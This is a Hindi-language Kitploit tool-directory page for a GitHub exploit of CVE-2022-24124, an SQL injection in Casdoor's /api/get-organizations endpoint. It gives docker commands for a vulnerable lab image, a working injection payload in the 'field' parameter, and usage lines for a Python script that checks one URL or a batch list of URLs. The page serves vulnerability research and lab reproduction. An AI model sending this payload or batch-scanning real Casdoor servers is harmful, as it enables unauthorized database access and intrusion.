Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-24124 — CVE-2022-24124 एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/b1gdog/cve-2022-24124
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubb1gdog/cve-2022-24124

CVE-2022-24124

CVE-2022-24124 एक्सप्लॉइट

रिपॉजिटरी देखें
223 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परिचय

Casdoor OAuth 2.0/OIDC पर आधारित एक केंद्रीकृत सिंगल साइन-ऑन (SSO) प्रमाणीकरण प्लेटफ़ॉर्म है


नंबर

CVE नंबर: CVE-2022-24124

CNPD नंबर: CNPD-202201-7304


प्रभावित संस्करण

खतरा स्तर: उच्च ( 7.5 HIGH )

POC/EXP: सार्वजनिक रूप से उपलब्ध

Casdoor < Casdoor 1.13.1 // संस्करण 1.13.1 से पहले के सभी संस्करण प्रभावित हैं


भेद्यता सारांश

यह भेद्यता SQL इंजेक्शन प्रकार की है। क्वेरी API में field और value पैरामीटर से संबंधित SQL इंजेक्शन भेद्यता मौजूद है, जैसा कि api/get-organizations में दिखाया गया है।


पुनरुत्पादन

भेद्यता इमेज खींचें

docker pull vulfocus/casdoor:1.13.0

docker खींचें

भेद्यता वातावरण प्रारंभ करें

docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

dockerRun

भेद्यता वातावरण का पृष्ठ खोलें

http

POC का उपयोग करके payload तैयार करें

POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

1661963474975


एक-क्लिक सत्यापन स्क्रिप्ट

घोषणा: यह उपकरण केवल सुरक्षा अनुसंधान या अधिकृत पेनेट्रेशन परीक्षण के लिए है। अवैध उपयोग के परिणामों के लिए उपयोगकर्ता स्वयं जिम्मेदार होगा; लेखक किसी भी ज़िम्मेदारी या सह-ज़िम्मेदारी को वहन नहीं करता है।

root@kitploit:~
python3 CVE-2022-24124.py -h

image

root@kitploit:~
python3 CVE-2022-24124.py -u http://127.0.0.1

image

root@kitploit:~
python3 CVE-2022-24124.py -f urls.txt

image


संबंधित जानकारी

https://nvd.nist.gov/vuln/detail/CVE-2022-24124

https://github.com/ColdFusionX/CVE-2022-24124

https://github.com/0xAbbarhSF/CVE-2022-24124

संदर्भ: https://www.t00ls.com/thread-66989-1-1.html

अभ्यास के लिए एक Python संस्करण लिखा गया, और एक बैच डिटेक्शन सुविधा भी जोड़ी गई।

टूल डाउनलोड करें